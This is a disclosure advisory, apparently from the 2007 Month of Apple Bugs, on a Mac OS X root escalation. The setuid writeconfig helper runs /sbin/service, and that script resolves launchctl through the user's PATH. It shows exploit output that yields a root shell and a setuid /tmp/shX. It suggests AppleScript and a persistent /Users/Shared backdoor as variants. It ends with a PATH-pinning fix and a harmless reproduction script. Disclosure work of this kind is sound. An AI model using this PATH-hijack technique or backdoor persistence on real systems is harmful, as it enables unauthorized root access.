Apple provides the following description in The Preference Application documentation:
System Preferences is the standard location for presenting system-level preferences on OSX. The preference panes shipped with Mac OS X include panes affecting hardware (such as the Sound, Mouse, and Display panes), software integrated into the system (such as the Dock and Screen Saver panes), and behavior applicable to every application (such as the International and General panes). When application preferences apply to the system or to the user's environment as a whole, a developer can make the preference pane available to System Preferences.
Several of the default preference panes rely on a setuid root helper, writeconfig (/System/Library/PrivateFrameworks/Admin.framework/Resources/writeconfig). writeconfig will attempt to start various services by invoking /sbin/service. Unfortunately, /sbin/service is a simple shell script that doesn't sanitize its PATH environment variable before calling the launchctl utility. Since PATH is inherited unchanged from the unprivileged user who opened the preference pane, this can be abused to execute arbitrary binaries with root privileges.
Verified on Mac OS X 10.4.8 (8L2127).
Proof of concept, exploit or instructions to reproduce
The provided (simplistic) exploit will create a root setuid shell wrapper at
/tmp/shX. It relies on minimal interaction by the user; read the
'Exploitation conditions' section, as this is just one of the possible
methods to abuse the issue.
$ ruby MOAB-21-01-2007.rb
++ Click on Sharing and then click on Windows Sharing...
sh-2.05b# id
uid=501(lmh) gid=501(lmh) euid=0(root) groups=501(lmh), 81(appserveradm), 79(appserverusr), 80(admin)
sh-2.05b# ls -al /private/tmp/
total 72
(...)
-rwxr-xr-x   1 lmh   wheel  13344 Jan 21 19:29 launchctl
-rwsr-xr-x   1 root  wheel  13344 Jan 21 19:29 shX
-rw-r--r--   1 lmh   wheel     78 Jan 21 19:29 t.c
sh-2.05b# exit
exit
Note: Nothing is being replaced by this exploit. Simply remove the files it created in /private/tmp (launchctl, shX and t.c in the listing above).
The following output shows the paths hardcoded in the writeconfig binary (launchctl is not among them) and the lack of PATH sanitization in /sbin/service, that is, no check that the binary to be executed is not located at a path writable by non-root users:
$ strings /System/Library/PrivateFrameworks/Admin.framework/Resources/writeconfig | grep '/sbin/'
/usr/sbin/ntpdate -bs
/usr/sbin/ntpd -f /var/run/ntp.drift -p /var/run/ntpd.pid
/usr/sbin/ntpdate
/usr/sbin/nvram
/sbin/service
/usr/sbin/apachectl
/usr/sbin/xgridctl
/usr/sbin/chown
/sbin/mount_hfs
/usr/sbin/mDNSResponder
/usr/sbin/ntpdate -bs
/usr/sbin/ntpd -f /var/run/ntp.drift -p /var/run/ntpd.pid
/usr/sbin/ntpdate
/usr/sbin/nvram
/sbin/service
/usr/sbin/apachectl
/usr/sbin/xgridctl
/usr/sbin/chown
/sbin/mount_hfs
/usr/sbin/mDNSResponder

$ cat /sbin/service | grep launchctl
[ "$2" == start ] && launchctl load -w /System/Library/LaunchDaemons/$1.plist
[ "$2" == stop ] && launchctl unload -w /System/Library/LaunchDaemons/$1.plist

kevin-finisterres-computer:~ kf$ ls -al /System/Library/PrivateFrameworks/Admin.framework/Resources/writeconfig
-rwsr-xr-x   1 root  wheel  141028 Jul 19  2006 /System/Library/PrivateFrameworks/Admin.framework/Resources/writeconfig

$ PATH="/Pwndertino" /Applications/System\ Preferences.app/Contents/MacOS/*
(...)
/sbin/service: line 115: launchctl: command not found
/sbin/service: line 115: launchctl: command not found
Apple: running/wrapping shell scripts from setuid binaries is a really Bad Idea ™.
Exploitation conditions

While some may argue that this requires 'user interaction', it's not true. The provided
exploit is simply an example of how to abuse the issue in the easiest way possible. It could
also be abused via AppleScript (which provides complete GUI scripting facilities), or by
'poisoning' the environment variables of the current user and, for example, placing the
backdoor under /Users/Shared (so that it persists across reboots and cleanups of temporary
directories). Via AppleScript, possibly no interaction would be needed; by just tampering with
the PATH environment variable, the user would still need to open the Sharing preference pane
themselves.

Depending on time availability, we might provide an exploit demonstrating these methods as well.
Workaround or temporary solution
Have /sbin/service set a fixed PATH before it executes anything, so that the head of the script reads:

$ head /sbin/service
#!/bin/sh
set -e
export PATH="/bin:/sbin:/usr/sbin:/usr/bin"

# don't let people kill us. We shouldn't be long, so this isn't a big deal.
trap "" TSTP
trap "" HUP
trap "" INT
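The script below is an added illustration, not part of this advisory and not Apple's code. It reproduces in a scratch directory the two things shown above: the unqualified launchctl call in /sbin/service being resolved through a caller-controlled PATH, and the pinned-PATH workaround defeating it. Nothing here is setuid and no real launchctl is executed; a marker file stands in for the payload that would run as root, and the directory names, the "moab-demo" service name and the run_service helper are assumptions of the example.

```shell
#!/bin/sh
# Added example, not from the advisory or from Apple: reproduces the
# unqualified "launchctl" lookup in a scratch directory. Nothing here is
# setuid and no real launchctl runs; a marker file stands in for the payload.
set -u

WORK=$(mktemp -d)                 # scratch tree (assumes mktemp -d is available)
trap 'rm -rf "$WORK"' EXIT
EVIL="$WORK/attacker-bin"         # a directory the unprivileged user can write
mkdir -p "$EVIL"

# The attacker's "launchctl": drops a marker instead of loading a daemon.
# Under the real bug this would run with the setuid helper's root privileges.
cat > "$EVIL/launchctl" <<EOF
#!/bin/sh
echo "hijacked: \$*" > "$WORK/marker"
EOF
chmod 755 "$EVIL/launchctl"

# Vulnerable stand-in for /sbin/service: launchctl is resolved through whatever
# PATH the caller inherited, the same shape as the grep'ed line above.
cat > "$WORK/service.vuln" <<'EOF'
#!/bin/sh
set -e
[ "$2" = start ] && launchctl load -w /System/Library/LaunchDaemons/$1.plist
EOF

# Hardened stand-in: identical, except PATH is pinned before anything is run,
# as in the workaround above.
cat > "$WORK/service.fixed" <<'EOF'
#!/bin/sh
set -e
export PATH="/bin:/sbin:/usr/sbin:/usr/bin"
[ "$2" = start ] && launchctl load -w /System/Library/LaunchDaemons/$1.plist
EOF
chmod 755 "$WORK/service.vuln" "$WORK/service.fixed"

# run_service NAME: run $WORK/NAME as "service moab-demo start" (hypothetical
# service name) with the attacker's directory first in PATH. Prints "hijacked"
# if the fake launchctl ran, "clean" otherwise. The script's own exit status is
# ignored: the fixed one dies with "launchctl: not found" on a machine without
# launchctl, and on Mac OS X the real launchctl merely fails on a missing plist.
run_service() {
    rm -f "$WORK/marker"
    PATH="$EVIL:$PATH" "$WORK/$1" moab-demo start >/dev/null 2>&1 || true
    if [ -f "$WORK/marker" ]; then echo hijacked; else echo clean; fi
}

echo "vulnerable service: $(run_service service.vuln)"   # hijacked
echo "fixed service:      $(run_service service.fixed)"  # clean
```

The attacker never needs to modify the script or the setuid helper: everything it controls is the PATH handed to System Preferences (compare the PATH="/Pwndertino" run above), so the only fix on the script side is to stop trusting that inherited value.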
"By using responsible disclosure - the vulnerability and exploit lifetimes can be decreased. Patches can be made more quickly. At least that’s what we experience in practice today." -- Dissertations on the unbalanced disclosure-patch times equation, by Dreg Futile Mghee.